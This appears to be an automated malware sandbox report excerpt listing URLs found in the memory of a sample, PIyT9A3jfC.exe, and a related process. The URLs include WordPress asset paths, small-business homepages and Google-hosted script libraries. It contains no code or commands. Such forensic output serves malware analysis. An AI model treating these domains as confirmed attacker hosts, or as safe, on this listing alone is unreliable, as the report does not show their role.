                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                  Source: PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/b
                  Source: PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/v1.0m
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/M
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/m1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/x
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.webeasy.com.hk
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/y
                  Source: PIyT9A3jfC.exe, 00000001.00000002.892219312.00000000060BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702693462.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/&v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/2I
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/P
                  Source: PIyT9A3jfC.exe, 00000001.00000002.892219312.00000000060BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.777742716.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/a
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/b
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/Is
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/ys
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.00000000076CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwomes.edu.pl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
